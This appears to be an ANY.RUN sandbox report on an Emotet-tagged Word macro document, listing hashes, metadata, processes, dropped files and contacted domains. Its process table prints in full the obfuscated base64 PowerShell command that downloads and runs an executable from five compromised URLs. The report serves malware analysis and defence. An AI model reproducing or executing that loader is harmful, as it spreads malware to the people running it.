analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

File 38128 916659818.doc

Full analysis: https://app.any.run/tasks/2d37f047-f2bf-4183-9d7c-154688766a2e
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 24, 2019, 20:02:20
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
opendir
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Intelligent, Subject: South Dakota, Author: Carol Carroll, Comments: COM Sao Tome and Principe, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri May 24 20:43:00 2019, Last Saved Time/Date: Fri May 24 20:43:00 2019, Number of Pages: 1, Number of Words: 16, Number of Characters: 94, Security: 0
MD5:

CADA57979FA3C839C18ED2E219C9A745

SHA1:

6986C7C1CF4A65FD98AA016CD1487920A7B4342A

SHA256:

75ABC222B82B46458EA2BBC132CFD46D43473559B20195E2CDD0EE3D044A04A6

SSDEEP:

3072:477HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qLBHaRxO8hT5:477HUUUUUUUUUUUUUUUUUUUT52VgBHaZ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 1484)
    • PowerShell script executed

      • powershell.exe (PID: 1484)
    • Executed via WMI

      • powershell.exe (PID: 1484)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1684)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1684)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Title: Intelligent
Subject: South Dakota
Author: Carol Carroll
Keywords: -
Comments: COM Sao Tome and Principe
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:05:24 19:43:00
ModifyDate: 2019:05:24 19:43:00
Pages: 1
Words: 16
Characters: 94
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Runolfsdottir Inc
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 109
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: McCullough
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
1684"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\File 38128 916659818.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1484powershell -nop -e JAB0ADYAdwA0AHUAbwA9ACcAdwA2ADAATQB0AG8AbABFACcAOwAkAEYAegBiAFIAUABhAE4AegAgAD0AIAAnADUAOAA1ACcAOwAkAG4AQwBKAF8AXwAwAD0AJwBaADgAdwBzADQAbwBMAEIAJwA7ACQARwBoAHAAQwA2AFoAbwBKAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABGAHoAYgBSAFAAYQBOAHoAKwAnAC4AZQB4AGUAJwA7ACQAbwBTAFEAXwA3AE4AZgAwAD0AJwBwAHIATAAyAF8AbQAnADsAJABHADEAbwBCAEgAaQB0AGwAPQAmACgAJwBuAGUAJwArACcAdwAtAG8AYgAnACsAJwBqAGUAJwArACcAYwB0ACcAKQAgAG4AZQB0AC4AYAB3AEUAYgBDAGAATABJAGUAYABOAFQAOwAkAEQASwByAFQAWgA3AD0AJwBoAHQAdABwADoALwAvAGEAZABhAGMAYQBuAC4AbgBlAHQALwBjAGcAaQAtAGIAaQBuAC8AQQByAFEAbABZAFcAVABHAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AYwB6AGEAYgBrAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBFAGQAUQBkAG8ARwBuAGIAQgB6AC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AcgBpAC0AbQBhAGcAYQB6AGkAbgBlAC4AYwBvAG0ALwByAGkALwB1AHMAbwBkADcAaQBuAGwAYwAzAF8AYQA4AGIAbwBsAHQALQAzADUALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBzAGgAYQBuAGcALQBkAGkAbgBnAC4AYwBvAG0ALgB0AHcALwBwAGgAcABtAHkAYQBkAG0AaQBuAC8AegBlADIANAB5AHYAdgBvAG0AXwB0AGsAZABwAG0AbAAzADQAdwAtADUANgAwADQAOQAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHQAYQBmAGEALgBwAHgAbABjAG8AcgBwAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwB4AEUAVgBLAGUAeQBHAFMALwAnAC4AcwBwAGwASQBUACgAJwBAACcAKQA7ACQAbAA3AHcANQA4ADQAPQAnAEkATQBGAGoAaABtAFgAVAAnADsAZgBvAHIAZQBhAGMAaAAoACQASwB2AE0ATQA3AHAAegAgAGkAbgAgACQARABLAHIAVABaADcAKQB7AHQAcgB5AHsAJABHADEAbwBCAEgAaQB0AGwALgBEAE8AVwBOAEwAbwBBAEQAZgBJAGwARQAoACQASwB2AE0ATQA3AHAAegAsACAAJABHAGgAcABDADYAWgBvAEoAKQA7ACQAdgB3AEgAOABpAEIARQB1AD0AJwBuADcAdABRAE4AQQBTAFIAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABHAGgAcABDADYAWgBvAEoAKQAuAEwARQBOAGcAdABoACAALQBnAGUAIAAzADkANwA3ADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAVABhAHIAVAAoACQARwBoAHAAQwA2AFoAbwBKACkAOwAkAFQARABJAEQAVAA0AFcAPQAnAFAANABDAEUAcwBwACcAOwBiAHIAZQBhAGsAOwAkAFgAdgAxAE0ANQBJAEIATgA9ACcAUgBoAFQARgBUADYAagBoACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHQASwBJAHMATQB6AGYANAA9ACcAYwBqADgAagAxAE8ARAAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 593
Read events
1 124
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
11

Dropped files

PID
Process
Filename
Type
1684WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVREE16.tmp.cvr
MD5:
SHA256:
1484powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KZJ08R3B5H0R6EDDQDPY.temp
MD5:
SHA256:
1684WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8D881A2A.wmfwmf
MD5:3E356A7AF25F0EBA0ABCD97B45CD0E0E
SHA256:C649828E6C2949B283BE405DBBB72D5D45903E62EF274848FD288A4ACBB38F69
1684WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\449A398D.wmfwmf
MD5:E1289578501661DCB11981206602BC5F
SHA256:8D01395AEDB4EE8380F43E5FEBB9BC0C028B4668A838CC6676D2340ADA8520EC
1684WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8701023.wmfwmf
MD5:3C8E7191BC319CDB0C3922DDA4E1469F
SHA256:6ACC236788D993BA782EAF2F2D5B4C800E0CB8B7FD69EB0C123B0B3AEE7750D9
1684WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\File 38128 916659818.doc.LNKlnk
MD5:632D6317C61646E9911056A8263C9849
SHA256:6076D8671585A8EE1A792D77A304E2CB31045128BC33EAB2563E1A78E50636D3
1684WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:17222E7BED955763CB75EBDA153E0074
SHA256:EAEB163582F92B56C14963150DA7DBEA34565552F3D187A793BE19BEB0978882
1684WINWORD.EXEC:\Users\admin\Downloads\~$le 38128 916659818.docpgc
MD5:4CEB43E2D3E008E847AC709B368C9681
SHA256:DE6AD5D48B60C13C529884649B367392B25129612A198D8438B0551980959A90
1684WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:793690AF4D980E6ADE41A519AB39B661
SHA256:C798B4B4E480B67CD4B783919AB2FE4B7C625C47564544FF5B07C751709D0AA1
1684WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\10F668BC.wmfwmf
MD5:79B5E2D696BF83EE1F1F7ADA3AD0F269
SHA256:6578089CC597DD0DA0074AF5C54CF0649D7447A6F7A6EF9141E3EFFB1CCFF137
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1484
powershell.exe
GET
404
13.124.222.135:80
http://www.shang-ding.com.tw/phpmyadmin/ze24yvvom_tkdpml34w-56049/
KR
xml
345 b
unknown
1484
powershell.exe
GET
404
104.31.87.57:80
http://www.czabk.com/wp-admin/EdQdoGnbBz/
US
xml
345 b
suspicious
1484
powershell.exe
GET
404
143.95.233.86:80
http://www.ri-magazine.com/ri/usod7inlc3_a8bolt-35/
US
xml
345 b
suspicious
1484
powershell.exe
GET
404
31.186.8.88:80
http://adacan.net/cgi-bin/ArQlYWTG/
TR
xml
345 b
suspicious
1484
powershell.exe
GET
404
175.176.161.147:80
http://www.tafa.pxlcorp.com/wp-includes/xEVKeyGS/
ID
xml
345 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1484
powershell.exe
143.95.233.86:80
www.ri-magazine.com
Colo4, LLC
US
suspicious
1484
powershell.exe
31.186.8.88:80
adacan.net
SAGLAYICI Teknoloji Bilisim Yayincilik Hiz. Ticaret Ltd. Sti.
TR
suspicious
1484
powershell.exe
13.124.222.135:80
www.shang-ding.com.tw
Amazon.com, Inc.
KR
unknown
1484
powershell.exe
104.31.87.57:80
www.czabk.com
Cloudflare Inc
US
shared
175.176.161.147:80
www.tafa.pxlcorp.com
Varnion Technology Semesta, PT
ID
suspicious

DNS requests

Domain
IP
Reputation
adacan.net
  • 31.186.8.88
suspicious
www.czabk.com
  • 104.31.87.57
  • 104.31.86.57
suspicious
www.ri-magazine.com
  • 143.95.233.86
suspicious
www.shang-ding.com.tw
  • 13.124.222.135
unknown
www.tafa.pxlcorp.com
  • 175.176.161.147
malicious

Threats

No threats detected
No debug info